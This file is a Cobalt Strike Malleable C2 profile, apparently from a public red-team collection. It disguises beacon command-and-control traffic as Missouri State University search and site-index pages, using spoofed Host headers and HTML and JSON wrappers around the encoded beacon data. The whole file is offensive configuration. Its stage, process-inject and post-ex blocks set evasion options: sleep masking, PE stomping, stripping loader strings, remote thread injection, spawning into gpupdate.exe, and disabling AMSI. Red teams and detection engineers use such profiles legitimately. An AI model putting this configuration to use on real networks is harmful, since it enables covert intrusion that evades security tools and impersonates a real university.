Malleable-C2-Profiles/normal/msu_edu.profile

303 lines
8.0 KiB
Plaintext
Raw Normal View History

2019-06-06 20:50:53 +00:00
#MSU education site profile
#xx0hcd
###Global Options###
set sample_name "msu_edu.profile";
set sleeptime "37500";
set jitter "33";
set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36";
#set host_stage "false";
###DNS options###
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";
###SMB options###
set pipename "ntsvcs";
set pipename_stager "scerpc";
###TCP options###
set tcp_port "8000";
###SSL Options###
#https-certificate {
#set keystore "your_store_file.store";
#set password "your_store_pass";
#}
#https-certificate {
# set C "US";
# set CN "whatever.com";
# set L "California";
# set O "whatever LLC.";
# set OU "local.org";
# set ST "CA";
# set validity "365";
#}
#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}
###HTTP-Config Block###
http-config {
#set headers "Server, Content-Type";
#header "Content-Type" "text/html;charset=UTF-8";
#header "Server" "nginx";
set trust_x_forwarded_for "false";
}
###HTTP-GET Block###
http-get {
set uri "/siteindex/a/ /siteindex/b/ /siteindex/c/";
#set verb "POST";
client {
header "Host" "search.missouristate.edu";
header "Accept" "*/*";
header "Accept-Language" "en";
header "Connection" "close";
metadata {
#base64
base64url;
#mask;
#netbios;
#netbiosu;
#prepend "TEST123";
#append ".php";
parameter "filter";
#header "Cookie";
#uri-append;
#print;
}
#parameter "test1" "test2";
}
server {
header "Cache-Control" "private";
header "Content-Type" "text/html; charset=utf-8";
header "Vary" "User-Agent";
header "Server" "Microsoft-IIS/8.5";
header "BackendServer" "Handle";
header "X-UA-Compatible" "IE=edge";
header "Connection" "close";
header "Set-Cookie" "WWW-SERVERID=handle; path=/";
output {
netbios;
#netbiosu;
#base64;
#base64url;
#mask;
prepend " <link href=\"/resource/styles\" media=\"all\" rel=\"stylesheet\" /> <script src=\"https://missouristate.info/scripts/2018/common.js?_q=";
prepend " <meta name=\"robots\" content=\"noindex\" /><link rel=\"Stylesheet\" media=\"all\" href=\"https://missouristate.info/styles/msuwds/main-sgf.css\" />\n";
prepend " <meta name=\"vireport\" content=\"width=device-width, initial-scale=1.0\" />\n";
prepend " <title>A - Site Index - Missouri State University</title>\n";
prepend " <meta charset=\"UTF-8\" />\n";
prepend "<head>";
prepend "<html lang=\"en\" itemscope itemtype=\"https://schema.org/SearchResultsPage\">\n";
prepend "<!DOCTYPE html>\n";
append "\"></script>\n";
append "<h2>About search</h2>\n";
append "<ul>\n";
append "<li><a href=\"https://www.missouristate.edu/web/search/aboutwebsearch.htm\">About web search</a></li>]n";
append "<li><a href=\"https://www.missouristate.edu/web/search/aboutpeoplesearch.htm\">About people search</a></li>\n";
append "<li><a href=\"https://www.missouristate.edu/web/search/abouteventsearch.htm\">About event search</a></li>\n";
append "<li><a href=\"https://www.missouristate.edu/web/search/aboutmapsearch.htm\">About map search</a></li>";
append "</ul>\n";
append "</div>";
print;
}
}
}
###HTTP-Post Block###
http-post {
set uri "/getsearchresults";
#set verb "GET";
set verb "POST";
client {
# header "Host" "search.missouristate.edu";
header "Connection" "close";
header "Accept" "*/*";
header "Accept-Language" "en-US";
output {
base64url;
parameter "site_indexFilter";
}
id {
base64url;
parameter "peopleFilter";
}
parameter "eventsFilter" "campus:sgf";
# parameter "mapFilter" "campus";
parameter "query" "my%20missouri%20state";
parameter "resultCounts" "5,3,3,3&";
}
server {
header "Cache-Control" "private";
header "Content-Type" "application/json; charset=utf-8";
header "Vary" "User-Agent,AcceptEncoding";
header "Server" "Microsoft-IIS/8.5";
header "BackendServer" "Handle";
header "X-UA-Compatible" "IE=edge";
header "Connection" "close";
output {
netbios;
prepend "[\"{\\\"results\\\":[\\\"{\\\\\\\"ID\\\\\\\":\\\\\\\"Missouri State University Foundation\\\\\\\",\\\\\\\"Name\\\\\\\":\\\\\\\"Missouri State University Foundation\\\\\\\",\\\\\\\"Url\\\\\\\":\\\\\\\"https://www.missouristatefoundation.org/\\\\\\\",\\\\\\\"Keywords\\\\\\\":";
append "\"\\\\\\\"development; endowment; foundation; Foundation, Missouri State; fundraising; missouri state foundation; missouri state university foundation\\\\\\\",\\\\\\\"UnitType\\\\\\\":\\\\\\\"Department\\\\\\\"}\\\",\\\"{\\\\\\\"ID\\\\\\\":\\\\\\\"Missouri State Outreach\\\\\\\",\\\\\\\"Name\\\\\\\":\\\\\\\"Missouri State Outreach\\\\\\\",\\\\\\\"Url\\\\\\\":\\\\\\\"https://outreach.missouristate.edu/\\\\\\\",\\\\\\\"Keywords\\\\\\\":\\\\\\\"distance learning; dual credit; evening; extended campus; Extended Campus (now Missouri State Outreach); i courses; i-courses; icourses; interactive video; itv; non credit; non-credit; noncredit; off campus; off-campus; offcampus; online; outreach; Outreach, Missouri State\\\\\\\"}\"]";
print;
}
}
}
###HTTP-Stager Block###
http-stager {
set uri_x86 "/Events";
set uri_x64 "/events";
client {
header "Host" "search.missouristate.com";
header "Accept" "*/*";
header "Accept-Language" "en";
header "Connection" "close";
#parameter "test1" "test2";
}
server {
header "Cache-Control" "private";
header "Content-Type" "private";
header "Vary" "User-Agent";
header "Server" "Microsoft-IIS/8.5";
header "BackendServer" "Handle";
header "X-UA-Compatible" "IE=edge";
header "Connection" "close";
header "Set-Cookie" "WWW-SERVERID=handle; path=/";
output {
#prepend "content=";
#append "</script>\n";
print;
}
}
}
###Malleable PE/Stage Block###
stage {
set checksum "0";
set compile_time "23 Nov 2018 02:25:37";
set entry_point "170000";
#set image_size_x86 "6586368";
#set image_size_x64 "6586368";
#set name "WWanMM.dll";
set userwx "false";
set cleanup "true";
set sleep_mask "true";
set stomppe "true";
set obfuscate "true";
set rich_header "";
set sleep_mask "true";
set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll";
transform-x86 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.dll" "";
}
transform-x64 {
prepend "\x90\x90\x90";
strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" "";
}
#string "something";
#data "something";
#stringw "something";
}
###Process Inject Block###
process-inject {
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "false";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
}
###Post-Ex Block###
post-ex {
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}